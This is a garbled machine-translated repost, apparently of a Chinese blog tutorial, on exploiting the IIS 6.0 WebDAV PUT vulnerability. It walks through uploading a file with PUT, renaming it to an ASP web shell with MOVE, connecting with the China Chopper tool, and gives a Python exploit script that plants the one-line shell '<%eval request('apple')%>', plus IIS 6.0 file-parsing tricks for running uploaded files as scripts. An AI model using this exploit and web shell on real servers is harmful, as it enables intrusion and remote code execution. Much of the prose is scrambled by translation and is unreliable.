脆弱性を悪用IIS6.0PUT


タイトル:IIS6.0 PUTの脆弱性
タグ:環境設定は、エクスプロイト
grammar_cjkRubyを:trueに
---

まず、抜け穴を利用IIS6.0PUT

デモ:
:から転載https://www.2cto.com/article/201311/259656.html
使用が脆弱IISを走査ScanerをPUT IISサーバーが構成要素はWebDAVは電流にスキャンできる引き起こさなっているため、この脆弱性は主に操作は、特定の操作は、実際にクエリを実行するかどうかOPTION WebDAVサポートのPUT経由することです。

特定の原則:http://www.2cto.com/Article/201307/228165.html

問題はWebDAVのコンポーネントであるかどうかを確認するために、我々は今、スワップを無効にするのWebDAV、ディスプレイはすぐにNOに次のように置く、これはPUTを見つけることによって時にIISのPUTのSCANERのWebDAVのクエリためです。

以下の実験では、最初のWebDAV開いてください。そして、桂林のベテランiiswriter使用

そして、データパケットを送信する、それがサーバーにファイル1.TXTを生成しますが、ファイルは、IISを解決できないので、MOVEすることを利用して、主な目的は、ASPを変更するために、ファイルをtxtをすることで、そのことができますファイルの実行スクリプトファイル。

それを確認し、実際にshell.aspファイルがあります

包丁とリンク

正常に接続チョッパー

二つは、IIS6.0PUTは、脆弱性は、溝を指すことになり活用します

1.アイデアの概要を使用:

まずPUTサーバに(TXT)パケット、およびパケットMOVEスクリプトを使用した方法は、より多くのshell.aspをアップロードしました。スクリプトすることができ、その後のアクセス

2.環境設定:これらは、理想的な場合は、サーバは以下の前提を持っている実環境を必要とします

開くにはIIS6.0の書き込み許可
リソーススクリプトへのアクセスを可能にするために開くIIS6.0の許可を(解決の脆弱性を解決することも可能)
IIS6.0の拡張を許可するように設定するのWebDAV

途中で発生する可能性のある質問3.

404が返されますIIS6.0へのPUTのASPスクリプト
のみIIS6.0ファイルを置くことができますが、このようなJPG、TXT形式として、解決できません

403の返された未開封の書き込み権限がする
ホームディレクトリの属性の書き込み権限で開きます

スクリプトの表示401 PUT上記の設定権限の後
:(推測サーバーのセキュリティ設定)
このステップでは、問題を解決する方法を考えていない、キーワードによる検索結果は、IIS
のネットワークユーザー権限管理システムが勝つと読み取るように設定を実行する必要があり、書き込み

207は成功を表すステータスコードを返す
(リターンが207ではない)が、スクリプトがリソースへのアクセスでない場合は、実際の変更が成功しません

三、IIS6.0PUTの脆弱性は、スクリプトを悪用し--python

#encoding="utf-8"
import requests

#分别需要put,move的url
put_url = 'http://192.168.111.139/2.txt'
move_url = 'http://192.168.111.139/2.txt'
move_headers = {
    'Destination':'http://192.168.111.139/shell9.asp'
}
#put的脚本
put_data = "<%eval request('apple')%>"
#最终的连接脚本,但似乎连接不成功
post_data = {
    'apple':''
}
try:
    response = requests.request('PUT',url=put_url,data=put_data)
    if response.status_code == 200:
        response = requests.request('MOVE',url=move_url,headers=move_headers)
        if response.status_code == 207:
            response = requests.post(url='http://192.168.111.139/shell9.asp',data=post_data)
            print(response.content.decode("gb2312"))
        else:
            print(response.status_code)
except:
    pass

レビューの下でIIS6.0を渡すの脆弱性の解析
の2つの方法で、脆弱性の解析IIS6.0
1を、ディレクトリ解決
するためのファイルで指定されたフォルダを.aspファイルには、ASPファイルとして実行されます。
2、解析するファイル
の.aspを、この変形のように.jpgファイル名は、「;」、後者は直接無視、それはと言うことです.aspファイルの実行。
IIS6.0デフォルトの実行可能ファイルには、3つのASPに加えて、含まれてい
.asa .cerの .CDX

参考:
https://cloud.tencent.com/info/bb174aee9d971192fa38127e48aadc8b.html
https://www.webshel​​l.cc/4294.html
https://www.2cto.com/article/201311/259656.html

おすすめ

転載: www.cnblogs.com/qianxinggz/p/11440278.html